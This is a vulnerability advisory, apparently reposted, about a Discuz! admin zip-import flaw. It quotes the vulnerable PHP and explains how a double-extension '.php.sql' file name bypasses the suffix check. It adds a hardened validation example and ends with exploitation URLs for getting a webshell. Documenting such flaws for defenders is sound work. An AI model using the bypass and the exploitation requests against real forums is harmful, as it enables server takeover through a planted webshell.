Discuz! admin/database.inc.php get-webshell vulnerability

2009-06-09T00:00:00
ID MYHACK58:62200923492
Type myhack58
Reporter Anonymous
Modified 2009-06-09T00:00:00

Description

author: ring04h team: http://www.80vul.com

[The vulnerability was discovered and submitted by ring04h, thx.] Because Discuz! admin\database.inc.php extracts zip files in action=importzip without adequately checking the entry names, an attacker can obtain a webshell.

I. Analysis

The relevant code in admin\database.inc.php:

    .....
    elseif($operation == 'importzip') {

        require_once DISCUZ_ROOT.'admin/zip.func.php';
        $unzip = new SimpleUnzip();
        $unzip->ReadFile($datafile_server);
        // Only the first entry's name is checked, and only its ".sql" suffix
        if($unzip->Count() == 0 || $unzip->GetError(0) != 0 || !preg_match("/\.sql$/i", $importfile = $unzip->GetName(0))) {
            cpmsg('database_import_file_illegal', '', 'error');
        }

        // Version check is taken from the "# Identify:" header of the first entry
        $identify = explode(',', base64_decode(preg_replace("/^# Identify:\s(\w+)./s", "\\1", substr($unzip->GetData(0), 0, 256))));
        $confirm = !empty($confirm) ? 1 : 0;
        if(!$confirm && $identify[1] != $version) {
            cpmsg('database_import_confirm', "admincp.php?action=database&operation=importzip&datafile_server=$datafile_server&importsubmit=yes&confirm=yes", 'form');
        }

        // Every entry whose name ends in ".sql" is written to disk under forumdata/
        $sqlfilecount = 0;
        foreach($unzip->Entries as $entry) {
            if(preg_match("/\.sql$/i", $entry->Name)) {
                $fp = fopen('./forumdata/'.$backupdir.'/'.$entry->Name, 'w');
                fwrite($fp, $entry->Data);
                fclose($fp);
                $sqlfilecount++;
            }
        }
    ......

Two points to note:

1. preg_match("/\.sql$/i", $importfile = $unzip->GetName(0)) only tests the trailing ".sql". With Apache's multiple-extension handling, a file named like 081127_k4pFUs3C-1.php.sql passes the check and is still treated as PHP.

2. $identify = explode(',', base64_decode(preg_replace("/^# Identify:\s(\w+)./s", "\\1", substr($unzip->GetData(0), 0, 256)))); so the file header format matters. [You can first make a backup, then modify it and repackage it as a zip.] The expected header looks like:

Identify: MTIyNzc1NzEyNSw2LjEuMCxkaXNjdXosbxvsdgl2b2wsmq==

Discuz! Multi-Volume Data Dump Vol. 1

Version: Discuz! 6.1.0

Time: 2008-11-27 11:38

Type: discuz

Table Prefix: cdb_
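To make the first point concrete from the defender's side, the following is an added example (not Discuz! code and not from the advisory author) that puts the suffix-only regex from the snippet above next to a strict allow-list check for names taken out of an uploaded zip. The hardened function assumes an import only ever needs a flat, single-extension ".sql" file name; the sample names are constructed for the demonstration.

```php
<?php
// Added example, not part of Discuz!: compare the original suffix-only check
// with a strict allow-list for zip entry names before they are written to disk.

// The check as it appears in admin/database.inc.php: only the trailing ".sql"
// is tested, so "x.php.sql" is accepted.
function accepted_by_original_check(string $name): bool
{
    return (bool) preg_match("/\.sql$/i", $name);
}

// Hardened check (assumption: a flat, single-extension ".sql" name is all an
// import needs). It rejects directory components and traversal, any dot inside
// the base name (so double extensions never reach Apache's multi-extension
// handling), and every character outside a small allow-list.
function is_safe_sql_entry_name(string $name): bool
{
    // No path separators: the name must equal its own basename.
    if ($name === '' || $name !== basename($name)) {
        return false;
    }
    // Exactly one extension, and it must be .sql; base name limited to [A-Za-z0-9_-].
    return (bool) preg_match('/^[A-Za-z0-9_-]+\.sql$/i', $name);
}

// Constructed sample entry names, including the shape the advisory describes.
$samples = [
    'backup_1.sql',
    '081127_k4pFUs3C-1.php.sql',   // double extension: original accepts, hardened rejects
    '../forumdata/evil.sql',       // traversal: original accepts, hardened rejects
    'data.sql.',                   // both reject
    'ok.SQL',                      // both accept (case-insensitive)
];

foreach ($samples as $name) {
    printf("%-30s original: %-6s hardened: %s\n",
        $name,
        accepted_by_original_check($name) ? 'accept' : 'reject',
        is_safe_sql_entry_name($name) ? 'accept' : 'reject');
}
```

The check should be applied to every entry in the archive, not just GetName(0) as the original code does, and before any fopen() under forumdata/: the original loop writes $entry->Name straight into the path, so the basename() comparison also closes the traversal that a crafted entry name would otherwise allow.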

II. Exploitation

Submit:

< 6.0: admincp.php?action=importzip&datafile_server=./attachment path/attachment name.zip&importsubmit=yes

= 6.1: admincp.php?action=database&operation=importzip&datafile_server=./attachment path/attachment name.zip&importsubmit=yes&frames=yes

III. Patch: none available